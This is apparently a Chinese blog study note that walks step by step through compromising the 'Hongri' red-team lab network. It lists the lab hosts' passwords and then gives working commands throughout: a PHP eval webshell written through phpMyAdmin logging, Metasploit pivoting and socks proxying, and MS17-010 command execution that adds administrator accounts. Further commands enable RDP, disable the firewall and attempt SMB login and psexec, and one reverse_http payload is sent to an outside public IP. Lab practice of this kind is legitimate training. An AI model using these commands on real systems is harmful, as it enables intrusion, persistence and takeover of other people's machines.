红日 (看下面这三个)192.168.52.0/24 网段
win2003 admin@123 192.168.52.141
win 7 hongrisec@2019 192.168.52.143 +外网
win 2008 admin@12AA 192.168.52.138
(
【红日内网渗透靶场1(ATK&CK红队评估实战靶场一) - 优快云 App】http://t.csdnimg.cn/81J6g
【内网渗透实战——红日ATT&CK系列靶场(一)学习笔记 - 优快云 App】http://t.csdnimg.cn/O6MXw
【红日内网渗透靶场1(ATK&CK红队评估实战靶场一) - 优快云 App】http://t.csdnimg.cn/bED0I
)
用nmap -T4 -O 192.168.75.131扫描分析端口有80,3306等端口(80web)
dirsearch -u http://192.168.75.131 -e * 扫描内容发现有phpMyAdmin
登入phpMyAdmin用那个破解软件破解密码进去
用
select @@basedir
select '<?php eval($_POST[cmd]);?>' into outfile 'c:/phpStudy/www/shell.php';
show variables like '%secure_file%';
show variables like '%general%'
set global general_log="ON"
set global general_log_file="C:/phpStudy/www/1.php"
SELECT '<?php eval($_POST["cmd"]);?>'(一个一个试发现只能用日志写一句话木马)
用蚁剑连接发现另一个网站(只能用那个主页源代码写一句话木马)
用蚁剑上传cs msf木马连接(看上面的操作cs,kali内网渗透)
两个都可以发现这个是内 外网两个(进行横向渗透)
用kali跟cs的扫描发现其他的两台主机,添加内网网段进行端口扫描主机扫描(内网信息收集)命令看csdn中的那些
192.168.52.138,192.168.52.141(80,135-139,445,330,3389)端口扫描
先用ms17_010
msf
getsystem(提权)
sysinfo
shell
net view
net view /domain
net group "domain controllers" /domain
net group "domain admins" /domain
net config Wrokstation
(扫描内网)(查看内网主机)
run autoroute -s 192.168.52.0/24(添加一条记录)
run post/multi/manage/autoroute(添加全部记录)
run autoroute -p
run post/multi/gather/ping_sweep rhosts=192.168.52.0/24(使用1,3,4)
exit(添加完内网网段才可以做下面步骤)
use auxiliary/scanner/portscan/tcp (端口扫描)
set rhosts 192.168.52.141
set ports 80,135-139,445,3306,3389(加一个代理socks有四个方法可以扫描内网网段)
run(可以紧跟漏洞扫描ms17_010)
proxychains使用(修改一下proxychains的配置127.0.0.1 1080)扫描外部内网
use auxiliary/server/socks_proxy
set rvshosts 127.0.0.1
set version 4a
run
proxychains rdesktop 192.168.52.141(跳网段控制得先添加网段,在开代理利用445添加用户登录)
(arp扫描cs也可以)
use post/windows/gather/arp_scanner
set rhosts 192.168.52.0/24
set session 12 (sessions都是background挂起会话的session)
run
msf下发会话给cs
background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set disablepayloadhandler true
set lhost 121.43.62.136 (公网ip跟端口)
set lport 5000
set session 12
cs跟msf联动
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.75.130
set lport 8888
ms17_010(use 2的利用)
set rhosts 192.168.52.141
set command net user
run
set command net user zgx620 zgx@620 /add
run
set command net localgroup administrators zgx620 /add
run
set command sc config tlntsvr start = auto
run
set command net start telnet
run
set command netstat -an
run
(上面是添加打开23telnet端口的命令利用,use auxiliary/scanner/telnet/telnet_login 攻击失败虽然会话建立起来了,但是是用不了)
set command net user sss qwer@1234 /add #添加用户
run # 发现用户添加不成功,后来发现是因为有密码设置策略,密码不能太简单。
set command net localgroup administrators sss /add #管理员权限
run
set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
#开启3389端口
run
set command netsh advfirewall set allprofiles state off #关闭防火墙
run #好像没有防火墙
net user qqq qwer@1234 /add # 添加账户密码
net localgroup administrators qqq /add # 添加为管理员权限
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# 开启3389端口(蚁剑用途)
use au.../scan/te.../te_login(还有一个ms08_067,用本身自己带的nmap扫描发现的但是攻击失败)
set username zgx620
set password zgx@620
set rhosts192.168.52.141
run
(smb有445,139windows)
search smb_login(不成功)
use 0
set rhosts 192.168.52.141
set smbpass admin@123(主要拿下那个域服务器的密码)
set smdomain god
set smbuser administrator
run
use exploit/windows/smb/ms08_067_netapi(不成功)
set rhost 192.168.52.141
set payload windows/meterpreter/bind_tcp
run
use exploit/windows/smb/psexec
set rhosts 192.168.52.138
set smbuser Administrator(不成功)
set smbdomain GOD
set smbpass admin@123(主要拿下那个域服务器的密码)
run
只用445的命令执行漏洞可以利用,那个命令执行漏洞执行的话,添加账号密码141添加到的是那个本地,138添加到域中
只能通过命令执行添加账号密码去利用proxychains远程桌面,或者是cs的psexec去用域账号密码登录(这个域账号密码抓不到除非三台一样的密码)
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
